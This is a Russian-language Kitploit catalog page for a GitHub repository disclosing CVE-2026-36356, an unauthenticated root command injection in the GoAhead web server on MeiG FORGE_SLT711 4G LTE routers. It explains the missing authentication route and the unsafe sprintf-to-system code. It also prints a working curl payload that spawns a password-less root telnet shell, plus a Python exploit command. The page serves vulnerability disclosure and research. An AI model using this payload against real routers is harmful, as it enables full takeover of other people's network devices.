Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-36356 — CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead - Внедрение команд ОС без аутентификации (RCE с правами root) | Kitploit
Инструменты/GitHubGitHub/totekuh/cve-2026-36356
Безопасность IoTАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеРазработка Полезной Нагрузки
GitHubtotekuh/cve-2026-36356

CVE-2026-36356

CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead - Внедрение команд ОС без аутентификации (RCE с правами root)

Репозиторий
13 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead — Неаутентифицированная инъекция OS-команд (/action/SetRemoteAccessCfg)

  • CVE: CVE-2026-36356
  • CWE: CWE-78, CWE-306
  • Исследователь: Daniil Gordeev
  • Раскрыто: 2026-05-03

Краткое описание

Веб-сервер GoAhead, поставляемый с 4G LTE CPE-устройствами MeiG Smart FORGE_SLT711, предоставляет неаутентифицированную HTTP-конечную точку /action/SetRemoteAccessCfg, которая подставляет управляемые пользователем JSON-данные в shell-команду без санитизации. Один неаутентифицированный POST-запрос выполняет произвольные команды с правами root.

Две независимые первопричины: отсутствующая запись маршрута аутентификации и небезопасная конструкция sprintf() → system() в обработчике.

Затронутые продукты

  • Вендор: MeiG Smart Technology Co., Ltd. (Шэньчжэнь, Китай)
  • Продукт: FORGE_SLT711 4G LTE CPE Router
  • Подтверждённая прошивка: MDM9607.LE.1.0-00110-STD.PROD-1 (прошивка модема BC-MGST711H_1.1.1_EQ101)
  • Веб-сервер: GoAhead 3.x (Embedthis) с пользовательскими обработчиками действий MeiG (/usr/bin/goahead)

Уязвимый код находится в пользовательском обработчике действий MeiG, а не в апстрим-версии GoAhead. Другие версии прошивки данной линейки продуктов, вероятно, также затронуты; независимо не проверялось.

Тестовое окружение

УстройствоOrtel 4G LTE CPE (OEM: MeiG FORGE_SLT711)
SoCQualcomm MDM9607, ARMv7 Cortex-A7
ЯдроLinux 3.18.48
ПрошивкаMDM9607.LE.1.0-00110-STD.PROD-1
Дата

Технические детали

Отсутствие аутентификации (CWE-306)

Конфигурация маршрутов GoAhead /var/www/route.txt содержит аутентифицированные маршруты (строки 64–150) с использованием auth=basic. /action/SetRemoteAccessCfg отсутствует в этом списке. Маршрутизация переходит к маршруту по умолчанию на строке 156:

root@kitploit:~
route uri=/action handler=action

Маршрут по умолчанию не имеет auth=basic, поэтому любой HTTP-клиент может вызвать /action/SetRemoteAccessCfg без учётных данных.

Инъекция команд (CWE-78)

Обработчик по смещению 0x0003c6d8 в /usr/bin/goahead декомпилируется в:

root@kitploit:~
char password_buf[64];      // 0x40 bytes on stack
char command_buf[256];      // 0x100 bytes on stack

websGetJsonItemValue(json, "password", STRING, password_buf, 0x40);
sprintf(command_buf, "echo root:\"%s\"|chpasswd", password_buf);
system(command_buf);

Поле password подставляется внутри двойных кавычек. Подстановка $(...) и обратные кавычки `...` раскрываются внутри двойных кавычек, поэтому атакующий контролирует shell-команду. system() выполняется с uid=0, поскольку процесс GoAhead работает с правами root. Никакой проверки ввода, экранирования или списка разрешённых символов нет.

Доказательство концепции

Постоянный telnet-бэкдор

root@kitploit:~
curl -s -X POST http://192.168.1.1/action/SetRemoteAccessCfg \
  -H "Content-Type: application/json" \
  -d '{"password":"$(telnetd -l /bin/sh -p 2323 &)"}'
# Reachable via: telnet 192.168.1.1 2323 (root shell, no password)

Unauthenticated RCE → root shell on a MeiG FORGE_SLT711 (Ortel 4G LTE CPE) via /action/SetRemoteAccessCfg

Эталонный эксплойт на Python

poc_rce.py (опубликован вместе с данным отчётом):

root@kitploit:~
python3 poc_rce.py --ip 192.168.1.1 --cmd 'id > /tmp/out'

Эксплуатация «слепая» — вывод команды не возвращается в HTTP-ответе.

Ограничения полезной нагрузки

  • Буфер password: 64 байта
  • Итоговый буфер команды: 256 байт
Скачать инструмент
2026-02-21